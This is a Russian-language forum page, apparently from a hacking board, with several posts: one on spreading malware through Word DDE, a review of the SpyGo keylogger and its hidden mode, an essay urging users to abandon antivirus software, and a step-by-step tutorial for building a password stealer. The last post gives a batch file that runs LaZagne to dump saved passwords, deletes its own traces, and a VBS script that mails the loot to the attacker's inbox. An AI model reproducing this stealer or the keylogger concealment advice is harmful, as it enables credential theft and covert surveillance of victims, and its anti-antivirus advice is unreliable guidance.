обнаружили, что способ заражения операционных системы Windows, который совершался благодаря давно устаревшему DDE, однако все еще поддерживаемого, позволит какому-нибудь файлу выполнять команды, которые будут находится в иных файлах. С помощью этого способа хакеры смогли засунуть в документ малварь, который будет загружать другие вредоносные скрипты и программы уже с интернета. То есть, после того, как жертва запустили документ с имеющимся там вирусом, то тот код, который там находился начинает подключаться к серверам злоумышленников, после чего устанавливая на компьютер различное вредоносное программное обеспеченье. То есть если хакеры обнаружат, что жертва располагает интересной и полезной информацией, то в бой могут пойти уже очень опасные и крайне эффективные шпионские вирусы, способные получить чуть ли не все данные. Из всего этого можно сделать вывод, что получить ваши личные данные очень просто, особенно если вы ведете себя не внимательно и слишком доверчиво. Ведь как мы с вами прекрасно знаем, бесплатны сыр только вы мышеловке. Поэтому чтобы избежать подобной утечке данных, нужно тщательно проверять источники скачивания файлов, а также избегать тех людей, которые явно пытаются вас надурить и вынудить на открытие файла. статья - Распространение вирусов через Word
  22. Сегодня мы рассмотрим кейлогер созданные для Windows любых версий – SpyGo. Этот кейлогер не использует агрессивное поведение, а это значит, что найти его не сложно, но он является законным. Сами авторы идут не по пути хакерских программ, созданных для шпионажа, а как средство, которое позволяет вести легальный мониторинг. Авторы всеми способами пытаются добиться того, что их творение не попала в БД антивирусов. Несмотря на то, что это ПО находится под шифром, но при себе имеет цифровую подпись. Поэтому на установщик этой программы не ругает ни один из антивирусов, а если быть точнее, лишь пару и то, только как подозрительное ПО. Этот кейлогер существует в трех различных версиях. Последнее обновление выходило в этом году. Принципиальное отличие версий заключается в том, что они имеют различные продвинутые опции. Например, в Ultima Edition мы можете включить прослушку через встроенный микрофон, а также узнать, где находится система с этой программой. Также данная продвинутая версия имеет в отличии от предыдущих дистанционные опции. Среди функций данной программы, можно отметить запоминание нажатий на клавиатуру а также вынимание информации из буфера обмена. Также данное ПО записывает информацию о системе, то есть когда была включена или выключена система или открытие каких-то приложений. Особенно хорошо справляется этот кейлогер с извлечением информации из браузера. Он способен узнавать все ваши посещения сайтов и запросы в поисковых системах. Также одной интересной функцией является то, что вы можете делать скриншоты, даже в играх и фильмах, а также получать информацию с веб-камеры. Главные пользователи этой программы чаще всего используют функции мониторинга информации в социальных сетях и прочих сервисах. Данная утилита способа дать вам всю эту информацию, просто записав это в отдельные логи. Также SpyGo является полезной программой по той причине, что запускать его можно в необходимое вам время и записывать лишь ту информацию, что вам нужно в тот или иной момент. Все полученные данные находятся под шифром. Это значит, что получить вы их сможете только с помощью этой программы. Все логи группируются по определенным фильтрам. Поэтому вы сможете примерно знать, как работает тот или иной пользователь, однако расхождения тоже бывают. Программа после установки сразу дает о себе знать. Во время этого действия на компьютер пользователя даже устанавливается ярлык открытия приложения, а в опциях пользователь сможет включать или отключать функцию уведомления о слежки. Если пользователь ее отключит, то после перезапуска будет выводится предупреждение. Это было задумано для того, чтобы к разработчикам не было претензий о том, что идет распространения софта для незаконной слежки. Однако включить некий скрытый режим можно вручную, после того как будет совершен первый запуск программы. В этом режиме окно программы не будет показаться, в трее не будет показываться значок, а также будут прочие сокрытия работы этой утилиты. Чтобы обратно открыть окно программы, вам нужно будет нажать специально выбранную комбинацию клавиш. Если же вы не помните эту комбинацию, то можете запустить установку еще раз, где вам будет сказано о том, что есть копия и она поможет вам открыть окно. Программа будет скрыта не только с рабочего стола и диспетчера задач, но и более продвинутых утилит для просмотра процессов. Практически все антивирусы не имеют реакции на этот кейлогер. Однако вот с диска эта программа далеко не убегает. Единственное, что содержащая его папка получает статус “скрытый” поэтому если вы имеете стандартные права, то вы его не увидите. Однако любыми другими файловыми менеджарами его будет легко найти по директории. Конечно, можно установить и в другое место, но это не дает особо результата, так как сам exe файл никогда не меняется, ведь если бы это было так, то он блокировался бы антивирусами как полиморфный вирус. В автозапуск системы добавится лишь RTDLib32.dll. Никаких жалоб со стороны антивирусов на него не будет, однако этот процесс очень легко обнаружить. Безусловно, есть большое количество кейлогеров. Однако практически все они будут основываться либо на The Rat, либо на описанном мною SpyGo.
  23. Наверняка вы всегда доверяете своему антивирусу, ведь он был создан для обеспечения безопасности вашего компьютера. Если кто-то говорит о том, как же защитить свою систему от нежелательного ПО, то первым делом, мы конечно же, вспоминает об антивирусе. В интернете постоянно можно увидеть рекламу различных антивирусов, поэтому это нормально, что пользователи считают антивирусы главным защитником их компьютера. Но на самом деле, ПО созданное для защиты от угроз, может их и нести. После того как вы установили антивирус, он сразу же обретает максимально возможные права, а это значит, что он может управлять практически любыми аспектами в вашей операционной системы, но все это подается под оберткой защитника системы. Чем больше сила, тем больше ответственность. Мы очень много слышали историй о проблемах IT-гигантов в сфере конфиденциальности информации пользователей. Например, недавний скандал с тем, что сотрудники сервиса Uber, могли без каких-либо проблем узнавать где находятся клиента, даже не предупреждая их об этом. Когда вы вызываете такси, то вы разрешаете вашему устройству дать данные о вашем местоположении. Конечно, если подумать, то как еще таксист узнать где вы находитесь, не используя телефонный разговор? Однако, как оказалось, вся эта информация эта сохранялась и воспользоваться ею можно было в любой момент. Ведь даже после пяти минут, после окончания доставки пассажира, эта информация был доступна. Никто до сих пор не знает, почему Uber использует эту функцию. Этот случай и говорит нам о том, что не нужно предоставлять приложениям максимум возможных ваших данных. Если вы и уверены на сто процентов, что какое-то приложение абсолютно безопасно, то это не значит, что ваши данные не могут попасть в чужие руки. Например, у apple не было таких проблем со слежкой, в отличии от Uber, который специально разрабатывал эти инструменты. Но наверняка, все слышали о том, как с облачного сервиса Apple, были украдены эротические фото знаменитостей. Получить чужую информацию можно было с помощью уязвимости, которые нашли и использовали хакеры. Несмотря на то, что данная компания имеет огромную популярность и внушает доверие к пользователям, но ведь нельзя быть уверенным в том, что этот сервис не будет взломан. Поэтому нужно руководствоваться правилом: никогда и никому не доверяй. Если вы будете его придерживаться, то шанс потери личной информации намного снижается. К примеру, сегодня есть немало сервисов, которые отслеживают как использовался ваш трафик, а это значит, что они могут узнать все страницы что вы посещали, что скачивали и что просматривали. А вы хотите, чтобы третьи лица знали эту информацию, взамен на просмотр куда вы потратили свой трафик? Ладно, мы немного отошли от темы, вернемся к антивирусам. Для примера будет отталкиваться от очень популярного антивируса – Касперский. Тут сразу же можно отметить то, что информация о сканируемых файлах отправляется, не предупредив об этом пользователя. Самое главное то, что эту функцию невозможно отменить. Это значит, что хеш, адрес файла его название и ваш ИП попадает в руки данной компании. Одним из случаев использования этих данных можно отметить, когда правоохранительные органы связались с журналистом, который на свой компьютер скачал вирусные файлы, чтобы их расследовать. Но ведь он их не запускал и не использовал, а это значит, что компьютер не был подвержен опасности. Однако, органы как-то узнали о том, что в его системе имеются вирусные файлы. Но на самом деле, все как никогда просто, Kaspersky получил всю информацию компьютера, после ее передали заинтересовавшимися правоохранителями. Также одна из не доверительных функций защитного ПО, это добавление специальных скриптов в ваши браузеры. Безусловно, еще не было ситуаций, когда эти скрипты начали сбоить, однако в любой момент эта ситуация может и поменяться. А как вы знаете, отключить эти функции обычно невозможно. Когда антивирус начинает обновляться, то он не просто получает файлы для установки свежей версии программы, но и обменивается информацией с вашим ПК. И это при том, что прочитать передаваемые данные невозможно, а это значит, что с вашего компьютера могут получить абсолютное любую информацию и вы не сможете этого узнать. Думаю, после прочтения данной статьи вы поймете, что стоит отказаться от использования данного ПО. Ведь если вы будете внимательно пользоваться интернетом, то шанс получения вирус крайне маленький. Поэтому если вы продвинутый пользователь, то антивирус станет только источником проблем.
  24. Всем привет, сегодня я вам расскажу, как собрать небольшой стиллер, выполнив всего лишь несколько простых пунктов. Наша программка будет отправлять всю вводимую информацию жертвы на вашу почту. Поэтому вооружаемся почтой и способом распространения стиллера и вперед! Начнем с того, что нам понадобится для его создания. Вот полный список: • LaZagne – программа, позволяющая восстанавливать пароли и позже записывать их в текстовый файл • Файл формата .bat который будет использовать для запуска вышеуказанной программы и указания директории хранения результатов • Скрипт VBS который понадобится для отправки письма на электронную почту • Конвертер VBS в EXE, однако, если хотите, то можете его и не использовать • Конвертер BAT в EXE 1.Нам необходимо создать файл формата .bat и записать туда эти строки: @Echo off laZagne.exe all > C:\install_error.bin TIMEOUT /T 2 sender.exe TIMEOUT /T 5 del /s "%UserProfile%\Downloads\laZagne.exe" del /s "%UserProfile%\Downloads\SENDER.exe" del /s "%UserProfile%\Desktop\laZagne.exe" del /s "%UserProfile%\Desktop\SENDER.exe" Строка “С:\install_error.bin” означает, что здесь будут храниться результаты, таймаут нужен для добавления ожидания при сохранении результата, обычно это около ста паролей в секунду. 2.Далее мы делаем обычный текстовый документ, там, где вам будет это удобно. После создания его нужно сохранить в виде .vbs файла. Туда нам нужно будет написать этот не самый большой код: Dim o_Mess, v_Conf v_Conf = "xttp://schemas.microsoft.com/cdo/configuration/" Set o_Mess = CreateObject ("CDO.Message") With o_Mess .To = "получатель@mail.com" 'место отправления .From = "Имя " 'Логин отправителя и его почта .Subject = "Log" название темы .TextBody = "BodyMail" письмо .AddAttachment "D:\install_error.bin" Прикрепление файла .TextBodyPart.Charset = "windows-1251" кодировка русских символов With .Configuration.Fields .Item(v_Conf & "sendusing") = 2 без использования каталога Server Exchange .Item(v_Conf & "smtpserver") = "smtp.mail.ru" Адрес SMTP-сервера .Item(v_Conf & "smtpauthenticate") = 1 Вид входа .Item(v_Conf & "sendusername") = "отправитель@mail.ru" логин человека .Item(v_Conf & "sendpassword") = "пароль отправителя" 'его пароль .Item(v_Conf & "smtpserverport") = 465 'порт (альтернативный - 465) .Item(v_Conf & "smtpusessl") = True использовать ли шифрованое подключение SSL .Item(v_Conf & "smtpconnectiontimeout") = 60 Время до завершения повторных попыток подключения .Update End With .send End With Set o_Mess = Nothing 3.Производим компиляцию всего этого месива с помощью конвертера из последнего пункта необходимых вещей. Как только вы это сделаете, просто сохраняете файл запуска и стартуете его. 4. Переходим на свою электронную почту и находим там письмо, которые было отправлено вашей программой. 5. Открываете файл с результатами в выбранной вами директории через любой текстовый редактор и собираете данные! Я никого ни к чему не призываю, статья написана в ознакомительных целях!
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.